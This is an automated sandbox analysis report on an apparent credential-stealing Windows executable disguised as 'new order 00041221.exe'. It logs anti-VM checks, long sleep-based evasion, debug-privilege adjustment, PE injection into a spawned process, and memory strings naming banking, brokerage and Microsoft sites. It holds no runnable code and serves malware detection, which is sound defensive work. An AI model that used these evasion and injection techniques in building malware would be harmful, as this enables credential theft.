                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: new order 00041221.exe PID: 1000, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\new order 00041221.exeMemory allocated: B50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeMemory allocated: 2850000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeMemory allocated: 2580000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeMemory allocated: 6D40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeMemory allocated: 7D40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeMemory allocated: 7FC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeMemory allocated: 8FC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeMemory allocated: 1270000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeMemory allocated: 2EE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeMemory allocated: 2DC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 599218Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 598890Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 598672Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 598461Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 598344Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 598125Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 598016Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 597797Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 597569Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 597447Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 597336Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 597219Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 597094Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 596961Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 596823Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 596588Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 596469Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 596318Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 596165Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 595844Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 595653Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 595547Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 595433Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 595313Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 595188Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 595063Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 594938Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 594828Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 594719Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 594594Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 594484Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 594374Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 594266Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 594156Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 594047Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 593937Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 593828Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeWindow / User API: threadDelayed 7356Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeWindow / User API: threadDelayed 2473Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 4296Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep count: 37 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7388Thread sleep count: 7356 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7388Thread sleep count: 2473 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -599766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -599656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -599546s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -599437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -599328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -599218s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -599109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -599000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -598890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -598781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -598672s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -598562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -598461s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -598344s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -598234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -598125s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -598016s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -597906s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -597797s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -597687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -597569s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -597447s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -597336s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -597219s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -597094s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -596961s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -596823s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -596703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -596588s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -596469s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -596318s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -596165s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -595844s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -595653s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -595547s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -595433s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -595313s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -595188s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -595063s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -594938s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -594828s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -594719s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -594594s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -594484s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -594374s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -594266s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -594156s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -594047s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -593937s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380Thread sleep time: -593828s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 599218Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 598890Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 598672Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 598461Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 598344Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 598125Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 598016Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 597797Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 597569Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 597447Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 597336Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 597219Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 597094Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 596961Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 596823Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 596588Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 596469Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 596318Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 596165Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 595844Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 595653Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 595547Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 595433Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 595313Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 595188Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 595063Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 594938Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 594828Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 594719Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 594594Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 594484Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 594374Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 594266Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 594156Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 594047Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 593937Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeThread delayed: delay time: 593828Jump to behavior
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                    Source: new order 00041221.exe, 00000003.00000002.3710772677.0000000001337000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<5
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                    Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeCode function: 3_2_05A397B0 LdrInitializeThunk,3_2_05A397B0
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\new order 00041221.exeMemory written: C:\Users\user\Desktop\new order 00041221.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess created: C:\Users\user\Desktop\new order 00041221.exe "C:\Users\user\Desktop\new order 00041221.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeQueries volume information: C:\Users\user\Desktop\new order 00041221.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeQueries volume information: C:\Users\user\Desktop\new order 00041221.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\new order 00041221.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
